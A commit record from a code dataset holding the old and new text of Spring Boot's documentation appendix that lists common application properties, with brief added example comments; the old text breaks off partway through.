/jenkins2-course-spring-boot,Pokbab\/spring-boot,drunklite\/spring-boot,hqrt\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,yangdd1205\/spring-boot,joshthornhill\/spring-boot,habuma\/spring-boot,qq83387856\/spring-boot,jjankar\/spring-boot,aahlenst\/spring-boot,artembilan\/spring-boot,sankin\/spring-boot,eonezhang\/spring-boot,mlc0202\/spring-boot,htynkn\/spring-boot,clarklj001\/spring-boot,jbovet\/spring-boot,drumonii\/spring-boot,NetoDevel\/spring-boot,patrikbeno\/spring-boot,mbrukman\/spring-boot,fjlopez\/spring-boot,jxblum\/spring-boot,RobertNickens\/spring-boot,xwjxwj30abc\/spring-b
oot,forestqqqq\/spring-boot,AngusZhu\/spring-boot,ihoneymon\/spring-boot,RichardCSantana\/spring-boot,dfa1\/spring-boot,pnambiarsf\/spring-boot,felipeg48\/spring-boot,lcardito\/spring-boot,jrrickard\/spring-boot,xiaoleiPENG\/my-project,liupd\/spring-boot,candrews\/spring-boot,sbuettner\/spring-boot,jxblum\/spring-boot,xdweleven\/spring-boot,pvorb\/spring-boot,panbiping\/spring-boot,RobertNickens\/spring-boot,mackeprm\/spring-boot,hehuabing\/spring-boot,DONIKAN\/spring-boot,smilence1986\/spring-boot,smayoorans\/spring-boot,nandakishorm\/spring-boot,dreis2211\/spring-boot,rickeysu\/spring-boot,jayeshmuralidharan\/spring-boot,axelfontaine\/spring-boot,srinivasan01\/spring-boot,snicoll\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,krmcbride\/spring-boot,joansmith\/spring-boot,jxblum\/spring-boot,keithsjohnson\/spring-boot,RainPlanter\/spring-boot,Xaerxess\/spring-boot,kiranbpatil\/spring-boot,frost2014\/spring-boot,Charkui\/spring-boot,gorcz\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,jforge\/spring-boot,npcode\/spring-boot,navarrogabriela\/spring-boot,navarrogabriela\/spring-boot,patrikbeno\/spring-boot,mohican0607\/spring-boot,chrylis\/spring-boot,cleverjava\/jenkins2-course-spring-boot,auvik\/spring-boot,scottfrederick\/spring-boot,roymanish\/spring-boot,npcode\/spring-boot,mike-kukla\/spring-boot,simonnordberg\/spring-boot,jayeshmuralidharan\/spring-boot,nghialunhaiha\/spring-boot,drunklite\/spring-boot,tsachev\/spring-boot,allyjunio\/spring-boot,Buzzardo\/spring-boot,mackeprm\/spring-boot,fjlopez\/spring-boot,sbcoba\/spring-boot,gorcz\/spring-boot,sebastiankirsch\/spring-boot,felipeg48\/spring-boot,AngusZhu\/spring-boot,ojacquemart\/spring-boot,pnambiarsf\/spring-boot,dnsw83\/spring-boot,yhj630520\/spring-boot,wwadge\/spring-boot,jorgepgjr\/spring-boot,xc145214\/spring-boot,SaravananParthasarathy\/SPSDemo,afroje-reshma\/spring-boot-sample,nelswadycki\/spring-boot,hqrt\/jenkins2-course-spring-boot,5zzang\/spring-boot,MasterRoots\/spring-boot,jayarampradhan\/spring-boot,cmsandiga\/spring-boot,nghialunhaiha\/spring-boot,MrMitchellMoore\/spring-boot,fjlopez\/spring-boot,smayoorans\/spring-boot,mabernardo\/spring-boot,eric-stanley\/spring-boot,zhangshuangquan\/spring-root,jxblum\/spring-boot,allyjunio\/spring-boot,bijukunjummen\/spring-boot,peteyan\/spring-boot,jvz\/spring-boot,kayelau\/spring-boot,damoyang\/spring-boot,habuma\/spring-boot,kdvolder\/spring-boot,mike-kukla\/spring-boot,axelfontaine\/spring-boot,mebinjacob\/spring-boot,MrMitchellMoore\/spring-boot,eric-stanley\/spring-boot,johnktims\/spring-boot,clarklj001\/spring-boot,orangesdk\/spring-boot,nareshmiriyala\/spring-boot,jbovet\/spring-boot,vpavic\/spring-boot,eonezhang\/spring-boot,satheeshmb\/spring-boot,felipeg48\/spring-boot,fogone\/spring-boot,kdvolder\/spring-boot,sungha\/spring-boot,royclarkson\/spring-boot,htynkn\/spring-boot,kayelau\/spring-boot,sankin\/spring-boot,tiarebalbi\/spring-boot,bjornlindstrom\/spring-boot,prakashme\/spring-boot,mdeinum\/spring-boot,DeezCashews\/spring-boot,lif123\/spring-boot,kdvolder\/spring-boot,meftaul\/spring-boot,michael-simons\/spring-boot,DONIKAN\/spring-boot,jrrickard\/spring-boot,yunbian\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,artembilan\/spring-boot,ameraljovic\/spring-boot,spring-projects\/spring-boot,ChunPIG\/spring-boot,jayeshmuralidharan\/spring-boot,npcode\/spring-boot,xwjxwj30abc\/spring-boot,aahlenst\/spring-boot,xingguang2013\/spring-boot,raiamber1\/spring-boot,axibase\/spring-boot,soul2zimate\/spring-boot,vandan16\/Vandan,SaravananParthasarathy\/
SPSDemo,ameraljovic\/spring-boot,damoyang\/spring-boot,thomasdarimont\/spring-boot,rweisleder\/spring-boot,Chomeh\/spring-boot,lcardito\/spring-boot,liupugong\/spring-boot,lokbun\/spring-boot,trecloux\/spring-boot,ydsakyclguozi\/spring-boot,Makhlab\/spring-boot,rmoorman\/spring-boot,srikalyan\/spring-boot,crackien\/spring-boot,hello2009chen\/spring-boot,axibase\/spring-boot,shangyi0102\/spring-boot,satheeshmb\/spring-boot,ApiSecRay\/spring-boot,meftaul\/spring-boot,zhanhb\/spring-boot,ilayaperumalg\/spring-boot,gauravbrills\/spring-boot,eliudiaz\/spring-boot,okba1\/spring-boot,qerub\/spring-boot,coolcao\/spring-boot,jmnarloch\/spring-boot,eddumelendez\/spring-boot,donthadineshkumar\/spring-boot,murilobr\/spring-boot,nisuhw\/spring-boot,shakuzen\/spring-boot,jmnarloch\/spring-boot,AngusZhu\/spring-boot,ralenmandao\/spring-boot,ChunPIG\/spring-boot,bjornlindstrom\/spring-boot,jack-luj\/spring-boot,lingounet\/spring-boot,peteyan\/spring-boot,satheeshmb\/spring-boot,tan9\/spring-boot,shakuzen\/spring-boot,gauravbrills\/spring-boot,frost2014\/spring-boot,DeezCashews\/spring-boot,hello2009chen\/spring-boot,simonnordberg\/spring-boot,philwebb\/spring-boot,srikalyan\/spring-boot,nandakishorm\/spring-boot,peteyan\/spring-boot,nareshmiriyala\/spring-boot,paddymahoney\/spring-boot,nurkiewicz\/spring-boot,mohican0607\/spring-boot,sebastiankirsch\/spring-boot,ihoneymon\/spring-boot,166yuan\/spring-boot,paddymahoney\/spring-boot,candrews\/spring-boot,lucassaldanha\/spring-boot,kiranbpatil\/spring-boot,frost2014\/spring-boot,pvorb\/spring-boot,nandakishorm\/spring-boot,shangyi0102\/spring-boot,rweisleder\/spring-boot,forestqqqq\/spring-boot,buobao\/spring-boot,end-user\/spring-boot,xialeizhou\/spring-boot,bbrouwer\/spring-boot,mosoft521\/spring-boot,166yuan\/spring-boot,xdweleven\/spring-boot,rams2588\/spring-boot,prasenjit-net\/spring-boot,Xaerxess\/spring-boot,designreuse\/spring-boot,dfa1\/spring-boot,nurkiewicz\/spring-boot,linead\/spring-boot,ractive\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,paddymahoney\/spring-boot,kdvolder\/spring-boot,kdvolder\/spring-boot,bclozel\/spring-boot,kayelau\/spring-boot,fulvio-m\/spring-boot,sankin\/spring-boot,panbiping\/spring-boot,snicoll\/spring-boot,donhuvy\/spring-boot,navarrogabriela\/spring-boot,mlc0202\/spring-boot,dreis2211\/spring-boot,jack-luj\/spring-boot,sungha\/spring-boot,fireshort\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_contents":":numbered!:\n[appendix]\n[[common-application-properties]]\n== Common application properties\nVarious properties can be specified inside your `application.properties`\/`application.yml`\nfile or as command line switches. This section provides a list of common Spring Boot\nproperties and references to the underlying classes that consume them.\n\nNOTE: Property contributions can come from additional jar files on your classpath so\nyou should not consider this an exhaustive list. It is also perfectly legit to define\nyour own properties.\n\nWARNING: This sample file is meant as a guide only. Do **not** copy\/paste the entire\ncontent into your application; rather pick only the properties that you need.
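\n\nTIP: Properties, YAML and command line switches are equivalent ways of setting the\nsame value. For example, `server.port=9000` in `application.properties` has the same\neffect as passing `--server.port=9000` on the command line, or as `port: 9000` nested\nunder a `server:` key in `application.yml`.\n\n\n[source,properties,indent=0,subs=\"verbatim,attributes,macros\"]\n----\n\t# ===================================================================\n\t# COMMON SPRING BOOT PROPERTIES\n\t#\n\t# This sample file is provided as a guideline. 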
Do NOT copy it in its\n\t# entirety to your own application.\n\t# ===================================================================\n\n\t# ----------------------------------------\n\t# CORE PROPERTIES\n\t# ----------------------------------------\n\n\t# SPRING CONFIG ({sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[ConfigFileApplicationListener])\n\tspring.config.name= # config file name (defaults to 'application')\n\tspring.config.location= # location of config file\n\n\t# PROFILES\n\tspring.profiles.active= # comma list of <<howto-set-active-spring-profiles,active profiles>>\n\n\t# APPLICATION SETTINGS ({sc-spring-boot}\/SpringApplication.{sc-ext}[SpringApplication])\n\tspring.main.sources=\n\tspring.main.web-environment= # detect by default\n\tspring.main.show-banner=true\n\tspring.main....= # see class for all properties\n\n\t# LOGGING\n\tlogging.path=\/var\/logs\n\tlogging.file=myapp.log\n\tlogging.config= # location of config file (default classpath:logback.xml for logback)\n logging.level.*= # levels for loggers, e.g. \"logging.level.org.springframework=DEBUG\" (TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF)\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.name=\n\tspring.application.index=\n\n\t# EMBEDDED SERVER CONFIGURATION ({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.port=8080\n\tserver.address= # bind to a specific NIC\n\tserver.session-timeout= # session timeout in seconds\n\tserver.context-path= # the context path, defaults to '\/'\n\tserver.servlet-path= # the servlet path, defaults to '\/'\n\tserver.ssl.client-auth= # want or need\n\tserver.ssl.key-alias=\n\tserver.ssl.key-password=\n\tserver.ssl.key-store=\n\tserver.ssl.key-store-password=\n\tserver.ssl.key-store-provider=\n\tserver.ssl.key-store-type=\n\tserver.ssl.protocol=TLS\n\tserver.ssl.trust-store=\n\tserver.ssl.trust-store-password=\n\tserver.ssl.trust-store-provider=\n\tserver.ssl.trust-store-type=\n\tserver.tomcat.access-log-pattern= # log pattern of the access log\n\tserver.tomcat.access-log-enabled=false # is access logging enabled\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # regular expression matching trusted IP addresses\n\tserver.tomcat.protocol-header=x-forwarded-proto # front end proxy forward header\n\tserver.tomcat.port-header= # front end proxy port header\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.basedir=\/tmp # base dir (usually not needed, defaults to tmp)\n\tserver.tomcat.background-processor-delay=30; # in seconds\n\tserver.tomcat.max-threads = 0 # number of threads in protocol handler\n\tserver.tomcat.uri-encoding = UTF-8 # character encoding to use for URL decoding
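\n\n\t# Example (editor's sketch): behind an SSL-terminating proxy that sends the\n\t# conventional X-Forwarded-* headers, the two header names above are usually\n\t# all that needs to be configured:\n\t#\n\t# server.tomcat.protocol-header=x-forwarded-proto\n\t# server.tomcat.remote-ip-header=x-forwarded-for\n\n\t# SPRING MVC ({sc-spring-boot-autoconfigure}\/web\/HttpMapperProperties.{sc-ext}[HttpMapperProperties])\n\thttp.mappers.json-pretty-print=false # pretty print JSON\n\thttp.mappers.json-sort-keys=false # sort keys\n\tspring.mvc.locale= # set fixed locale, e.g. en_UK\n\tspring.mvc.date-format= # set fixed date format, e.g. dd\/MM\/yyyy\n\tspring.mvc.message-codes-resolver-format= # PREFIX_ERROR_CODE \/ POSTFIX_ERROR_CODE\n\tspring.view.prefix= # MVC view prefix\n\tspring.view.suffix= # ... 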
and suffix\n\tspring.resources.cache-period= # cache timeouts in headers sent to browser\n\tspring.resources.add-mappings=true # if default mappings should be added\n\n\t# THYMELEAF ({sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[ThymeleafAutoConfiguration])\n\tspring.thymeleaf.check-template-location=true\n\tspring.thymeleaf.prefix=classpath:\/templates\/\n\tspring.thymeleaf.suffix=.html\n\tspring.thymeleaf.mode=HTML5\n\tspring.thymeleaf.encoding=UTF-8\n\tspring.thymeleaf.content-type=text\/html # ;charset=<encoding> is added\n\tspring.thymeleaf.cache=true # set to false for hot refresh\n\n\t# FREEMARKER ({sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[FreeMarkerAutoConfiguration])\n\tspring.freemarker.allow-request-override=false\n\tspring.freemarker.cache=true\n\tspring.freemarker.check-template-location=true\n\tspring.freemarker.char-set=UTF-8\n\tspring.freemarker.contentType=text\/html\n\tspring.freemarker.exposeRequestAttributes=false\n\tspring.freemarker.exposeSessionAttributes=false\n\tspring.freemarker.exposeSpringMacroHelpers=false\n\tspring.freemarker.prefix=\n\tspring.freemarker.requestContextAttribute=\n\tspring.freemarker.settings.*=\n\tspring.freemarker.suffix=.ftl\n\tspring.freemarker.template-loader-path=classpath:\/templates\/\n\tspring.freemarker.viewNames= # whitelist of view names that can be resolved\n\n\t# GROOVY TEMPLATES ({sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[GroovyTemplateAutoConfiguration])\n\tspring.groovy.template.cache=true\n\tspring.groovy.template.char-set=UTF-8\n\tspring.groovy.template.configuration.*= # See Groovy's TemplateConfiguration\n\tspring.groovy.template.contentType=text\/html\n\tspring.groovy.template.prefix=classpath:\/templates\/\n\tspring.groovy.template.suffix=.tpl\n\tspring.groovy.template.view-names= # whitelist of view names that can be resolved\n\n\t# VELOCITY TEMPLATES ({sc-spring-boot-autoconfigure}\/velocity\/VelocityAutoConfiguration.{sc-ext}[VelocityAutoConfiguration])\n\tspring.velocity.allow-request-override=false\n\tspring.velocity.cache=true\n\tspring.velocity.check-template-location=true\n\tspring.velocity.char-set=UTF-8\n\tspring.velocity.content-type=text\/html\n\tspring.velocity.date-tool-attribute=\n\tspring.velocity.expose-Request-attributes=false\n\tspring.velocity.expose-Session-attributes=false\n\tspring.velocity.expose-Spring-macro-helpers=false\n\tspring.velocity.number-tool-attribute=\n\tspring.velocity.prefix=\n\tspring.velocity.properties.*=\n\tspring.velocity.request-context-attribute=\n\tspring.velocity.resource-loader-path=classpath:\/templates\/\n\tspring.velocity.suffix=.vm\n\tspring.velocity.view-names= # whitelist of view names that can be resolved\n\n\t# INTERNATIONALIZATION ({sc-spring-boot-autoconfigure}\/MessageSourceAutoConfiguration.{sc-ext}[MessageSourceAutoConfiguration])\n\tspring.messages.basename=messages\n\tspring.messages.cacheSeconds=-1\n\tspring.messages.encoding=UTF-8\n\n\t[[common-application-properties-security]]\n\t# SECURITY ({sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[SecurityProperties])\n\tsecurity.user.name=user # login username\n\tsecurity.user.password= # login password\n\tsecurity.user.role=USER # role assigned to the user\n\tsecurity.require-ssl=false # advanced settings ...\n\tsecurity.enable-csrf=false\n\tsecurity.basic.enabled=true\n\tsecurity.basic.realm=Spring\n\tsecurity.basic.path= # 
\/**\n\tsecurity.headers.xss=false\n\tsecurity.headers.cache=false\n\tsecurity.headers.frame=false\n\tsecurity.headers.content-type=false\n\tsecurity.headers.hsts=all # none \/ domain \/ all\n\tsecurity.sessions=stateless # always \/ never \/ if_required \/ stateless\n\tsecurity.ignored=false\n\n\t# DATASOURCE ({sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[DataSourceAutoConfiguration] & {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[DataSourceProperties])\n\tspring.datasource.name= # name of the data source\n\tspring.datasource.initialize=true # populate using data.sql\n\tspring.datasource.schema= # a schema (DDL) script resource reference\n\tspring.datasource.data= # a data (DML) script resource reference\n\tspring.datasource.sql-script-encoding= # a charset for reading SQL scripts\n\tspring.datasource.platform= # the platform to use in the schema resource (schema-${platform}.sql)\n\tspring.datasource.continue-on-error=false # continue even if can't be initialized\n\tspring.datasource.separator=; # statement separator in SQL initialization scripts\n\tspring.datasource.driver-class-name= # JDBC Settings...\n\tspring.datasource.url=\n\tspring.datasource.username=\n\tspring.datasource.password=\n\tspring.datasource.max-active=100 # Advanced configuration...\n\tspring.datasource.max-idle=8\n\tspring.datasource.min-idle=8\n\tspring.datasource.initial-size=10\n\tspring.datasource.validation-query=\n\tspring.datasource.test-on-borrow=false\n\tspring.datasource.test-on-return=false\n\tspring.datasource.test-while-idle=\n\tspring.datasource.time-between-eviction-runs-millis=\n\tspring.datasource.min-evictable-idle-time-millis=\n\tspring.datasource.max-wait=\n\n\t# MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/MongoProperties.{sc-ext}[MongoProperties])\n\tspring.data.mongodb.host= # the db host\n\tspring.data.mongodb.port=27017 # the connection port (defaults to 27017)\n\tspring.data.mongodb.uri=mongodb:\/\/localhost\/test # connection URL\n\tspring.data.mongo.repositories.enabled=true # if spring data repository support is enabled\n\n\t# JPA ({sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[JpaBaseConfiguration], {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[HibernateJpaAutoConfiguration])\n\tspring.jpa.properties.*= # properties to set on the JPA connection\n\tspring.jpa.open-in-view=true\n\tspring.jpa.show-sql=true\n\tspring.jpa.database-platform=\n\tspring.jpa.database=\n\tspring.jpa.generate-ddl=false # ignored by Hibernate, might be useful for other vendors\n\tspring.jpa.hibernate.naming-strategy= # naming classname\n\tspring.jpa.hibernate.ddl-auto= # defaults to create-drop for embedded dbs\n\tspring.data.jpa.repositories.enabled=true # if spring data repository support is enabled\n\n\t# SOLR ({sc-spring-boot-autoconfigure}\/solr\/SolrProperties.{sc-ext}[SolrProperties])\n\tspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr\n\tspring.data.solr.zk-host=\n\tspring.data.solr.repositories.enabled=true # if spring data repository support is enabled
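\n\n\t# Example (editor's sketch, the host name is a placeholder): for a\n\t# ZooKeeper-managed SolrCloud cluster, set zk-host instead of a direct host URL:\n\t#\n\t# spring.data.solr.zk-host=zk1.example.com:2181\n\n\t# ELASTICSEARCH ({sc-spring-boot-autoconfigure}\/elasticsearch\/ElasticsearchProperties.{sc-ext}[ElasticsearchProperties])\n\tspring.data.elasticsearch.cluster-name= # The cluster name (defaults to elasticsearch)\n\tspring.data.elasticsearch.cluster-nodes= # The address(es) of the server node (comma-separated; if not specified starts a client node)\n\tspring.data.elasticsearch.repositories.enabled=true # if spring data repository 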
support is enabled\n\n\n\n\t# FLYWAY ({sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[FlywayProperties])\n\tflyway.locations=classpath:db\/migration # locations of migrations scripts\n\tflyway.schemas= # schemas to update\n\tflyway.init-version= 1 # version to start migration\n\tflyway.sql-migration-prefix=V\n\tflyway.sql-migration-suffix=.sql\n\tflyway.enabled=true\n\tflyway.url= # JDBC url if you want Flyway to create its own DataSource\n\tflyway.user= # JDBC username if you want Flyway to create its own DataSource\n\tflyway.password= # JDBC password if you want Flyway to create its own DataSource\n\n\t# LIQUIBASE ({sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[LiquibaseProperties])\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml\n\tliquibase.contexts= # runtime contexts to use\n\tliquibase.default-schema= # default database schema to use\n\tliquibase.drop-first=false\n\tliquibase.enabled=true\n\tliquibase.url= # specific JDBC url (if not set the default datasource is used)\n\tliquibase.user= # user name for liquibase.url\n\tliquibase.password= # password for liquibase.url\n\n\t# JMX\n\tspring.jmx.enabled=true # Expose MBeans from Spring\n\n\t# RABBIT ({sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[RabbitProperties])\n\tspring.rabbitmq.host= # connection host\n\tspring.rabbitmq.port= # connection port\n\tspring.rabbitmq.addresses= # connection addresses (e.g. myhost:9999,otherhost:1111)\n\tspring.rabbitmq.username= # login user\n\tspring.rabbitmq.password= # login password\n\tspring.rabbitmq.virtual-host=\n\tspring.rabbitmq.dynamic=\n\n\t# REDIS ({sc-spring-boot-autoconfigure}\/redis\/RedisProperties.{sc-ext}[RedisProperties])\n\tspring.redis.host=localhost # server host\n\tspring.redis.password= # server password\n\tspring.redis.port=6379 # connection port\n\tspring.redis.pool.max-idle=8 # pool settings ...\n\tspring.redis.pool.min-idle=0\n\tspring.redis.pool.max-active=8\n\tspring.redis.pool.max-wait=-1\n\n\t# ACTIVEMQ ({sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[ActiveMQProperties])\n\tspring.activemq.broker-url=tcp:\/\/localhost:61616 # connection URL\n\tspring.activemq.user=\n\tspring.activemq.password=\n\tspring.activemq.in-memory=true # broker kind to create if no broker-url is specified\n\tspring.activemq.pooled=false\n\n\t# HornetQ ({sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[HornetQProperties])\n\tspring.hornetq.mode= # connection mode (native, embedded)\n\tspring.hornetq.host=localhost # hornetQ host (native mode)\n\tspring.hornetq.port=5445 # hornetQ port (native mode)\n\tspring.hornetq.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.hornetq.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.hornetq.embedded.persistent=false # message persistence\n\tspring.hornetq.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.hornetq.embedded.queues= # comma-separated queues to create on startup\n\tspring.hornetq.embedded.topics= # comma-separated topics to create on startup\n\tspring.hornetq.embedded.cluster-password= # cluster password (randomly generated by default)\n\n\t# JMS ({sc-spring-boot-autoconfigure}\/jms\/JmsProperties.{sc-ext}[JmsProperties])\n\tspring.jms.pub-sub-domain= # false for queue (default), true for topic
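\n\n\t# Example (editor's sketch, the broker host is a placeholder): the in-memory\n\t# broker is convenient for tests; pointing at an external broker is only a URL\n\t# change:\n\t#\n\t# spring.activemq.in-memory=false\n\t# spring.activemq.broker-url=tcp:\/\/broker.example.com:61616\n\n\t# SPRING BATCH 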
({sc-spring-boot-autoconfigure}\/batch\/BatchDatabaseInitializer.{sc-ext}[BatchDatabaseInitializer])\n\tspring.batch.job.names=job1,job2\n\tspring.batch.job.enabled=true\n\tspring.batch.initializer.enabled=true\n\tspring.batch.schema= # batch schema to load\n\n\t# AOP\n\tspring.aop.auto=\n\tspring.aop.proxy-target-class=\n\n\t# FILE ENCODING ({sc-spring-boot}\/context\/FileEncodingApplicationListener.{sc-ext}[FileEncodingApplicationListener])\n\tspring.mandatory-file-encoding=false\n\n\t# SPRING SOCIAL ({sc-spring-boot-autoconfigure}\/social\/SocialWebAutoConfiguration.{sc-ext}[SocialWebAutoConfiguration])\n\tspring.social.auto-connection-views=true # Set to true for default connection views or false if you provide your own\n\n\t# SPRING SOCIAL FACEBOOK ({sc-spring-boot-autoconfigure}\/social\/FacebookAutoConfiguration.{sc-ext}[FacebookAutoConfiguration])\n\tspring.social.facebook.app-id= # your application's Facebook App ID\n\tspring.social.facebook.app-secret= # your application's Facebook App Secret\n\n\t# SPRING SOCIAL LINKEDIN ({sc-spring-boot-autoconfigure}\/social\/LinkedInAutoConfiguration.{sc-ext}[LinkedInAutoConfiguration])\n\tspring.social.linkedin.app-id= # your application's LinkedIn App ID\n\tspring.social.linkedin.app-secret= # your application's LinkedIn App Secret\n\n\t# SPRING SOCIAL TWITTER ({sc-spring-boot-autoconfigure}\/social\/TwitterAutoConfiguration.{sc-ext}[TwitterAutoConfiguration])\n\tspring.social.twitter.app-id= # your application's Twitter App ID\n\tspring.social.twitter.app-secret= # your application's Twitter App Secret\n\n\t# SPRING MOBILE SITE PREFERENCE ({sc-spring-boot-autoconfigure}\/mobile\/SitePreferenceAutoConfiguration.{sc-ext}[SitePreferenceAutoConfiguration])\n\tspring.mobile.sitepreference.enabled=true # enabled by default\n\n\t# SPRING MOBILE DEVICE VIEWS ({sc-spring-boot-autoconfigure}\/mobile\/DeviceDelegatingViewResolverAutoConfiguration.{sc-ext}[DeviceDelegatingViewResolverAutoConfiguration])\n\tspring.mobile.devicedelegatingviewresolver.enabled=true # disabled by default\n\tspring.mobile.devicedelegatingviewresolver.normal-prefix=\n\tspring.mobile.devicedelegatingviewresolver.normal-suffix=\n\tspring.mobile.devicedelegatingviewresolver.mobile-prefix=mobile\/\n\tspring.mobile.devicedelegatingviewresolver.mobile-suffix=\n\tspring.mobile.devicedelegatingviewresolver.tablet-prefix=tablet\/\n\tspring.mobile.devicedelegatingviewresolver.tablet-suffix=\n\n\t# ----------------------------------------\n\t# ACTUATOR PROPERTIES\n\t# ----------------------------------------\n\n\t# MANAGEMENT HTTP SERVER ({sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[ManagementServerProperties])\n\tmanagement.port= # defaults to 'server.port'\n\tmanagement.address= # bind to a specific NIC\n\tmanagement.context-path= # default to '\/'\n\tmanagement.add-application-context-header= # default to true\n\n\t# ENDPOINTS ({sc-spring-boot-actuator}\/endpoint\/AbstractEndpoint.{sc-ext}[AbstractEndpoint] 
subclasses)\n\tendpoints.autoconfig.id=autoconfig\n\tendpoints.autoconfig.sensitive=true\n\tendpoints.autoconfig.enabled=true\n\tendpoints.beans.id=beans\n\tendpoints.beans.sensitive=true\n\tendpoints.beans.enabled=true\n\tendpoints.configprops.id=configprops\n\tendpoints.configprops.sensitive=true\n\tendpoints.configprops.enabled=true\n\tendpoints.configprops.keys-to-sanitize=password,secret\n\tendpoints.dump.id=dump\n\tendpoints.dump.sensitive=true\n\tendpoints.dump.enabled=true\n\tendpoints.env.id=env\n\tendpoints.env.sensitive=true\n\tendpoints.env.enabled=true\n\tendpoints.health.id=health\n\tendpoints.health.sensitive=false\n\tendpoints.health.enabled=true\n\tendpoints.info.id=info\n\tendpoints.info.sensitive=false\n\tendpoints.info.enabled=true\n\tendpoints.metrics.id=metrics\n\tendpoints.metrics.sensitive=true\n\tendpoints.metrics.enabled=true\n\tendpoints.shutdown.id=shutdown\n\tendpoints.shutdown.sensitive=true\n\tendpoints.shutdown.enabled=false\n\tendpoints.trace.id=trace\n\tendpoints.trace.sensitive=true\n\tendpoints.trace.enabled=true\n\n\t# HEALTH INDICATORS\n\thealth.db.enabled=true\n health.mongo.enabled=true\n health.rabbit.enabled=true\n health.redis.enabled=true\n health.solr.enabled=true\n\thealth.status.order=DOWN, OUT_OF_SERVICE, UNKNOWN, UP\n\n\t# MVC ONLY ENDPOINTS\n\tendpoints.jolokia.path=jolokia\n\tendpoints.jolokia.sensitive=true\n\tendpoints.jolokia.enabled=true # when using Jolokia\n\n\t# JMX ENDPOINT ({sc-spring-boot-actuator}\/autoconfigure\/EndpointMBeanExportProperties.{sc-ext}[EndpointMBeanExportProperties])\n\tendpoints.jmx.enabled=true\n\tendpoints.jmx.domain= # the JMX domain, defaults to 'org.springboot'\n\tendpoints.jmx.unique-names=false\n\tendpoints.jmx.static-names=\n\n\t# JOLOKIA ({sc-spring-boot-actuator}\/autoconfigure\/JolokiaProperties.{sc-ext}[JolokiaProperties])\n\tjolokia.config.*= # See Jolokia manual\n\n\t# REMOTE SHELL\n\tshell.auth=simple # jaas, key, simple, spring\n\tshell.command-refresh-interval=-1\n\tshell.command-path-patterns= # classpath*:\/commands\/**, classpath*:\/crash\/commands\/**\n\tshell.config-path-patterns= # classpath*:\/crash\/*\n\tshell.disabled-plugins=false # don't expose plugins\n\tshell.ssh.enabled= # ssh settings ...\n\tshell.ssh.key-path=\n\tshell.ssh.port=\n\tshell.telnet.enabled= # telnet settings ...\n\tshell.telnet.port=\n\tshell.auth.jaas.domain= # authentication settings ...\n\tshell.auth.key.path=\n\tshell.auth.simple.user.name=\n\tshell.auth.simple.user.password=\n\tshell.auth.spring.roles=\n\n\t# GIT INFO\n\tspring.git.properties= # resource ref to generated git info properties file\n----\n","old_contents":":numbered!:\n[appendix]\n[[common-application-properties]]\n== Common application properties\nVarious properties can be specified inside your `application.properties`\/`application.yml`\nfile or as command line switches. This section provides a list of common Spring Boot\nproperties and references to the underlying classes that consume them.\n\nNOTE: Property contributions can come from additional jar files on your classpath so\nyou should not consider this an exhaustive list. It is also perfectly legit to define\nyour own properties.\n\nWARNING: This sample file is meant as a guide only. 
Do **not** copy\/paste the entire\ncontent into your application; rather pick only the properties that you need.\n\n\n[source,properties,indent=0,subs=\"verbatim,attributes,macros\"]\n----\n\t# ===================================================================\n\t# COMMON SPRING BOOT PROPERTIES\n\t#\n\t# This sample file is provided as a guideline. Do NOT copy it in its\n\t# entirety to your own application. ^^^\n\t# ===================================================================\n\n\t# ----------------------------------------\n\t# CORE PROPERTIES\n\t# ----------------------------------------\n\n\t# SPRING CONFIG ({sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[ConfigFileApplicationListener])\n\tspring.config.name= # config file name (default to 'application')\n\tspring.config.location= # location of config file\n\n\t# PROFILES\n\tspring.profiles.active= # comma list of <<howto-set-active-spring-profiles,active profiles>>\n\n\t# APPLICATION SETTINGS 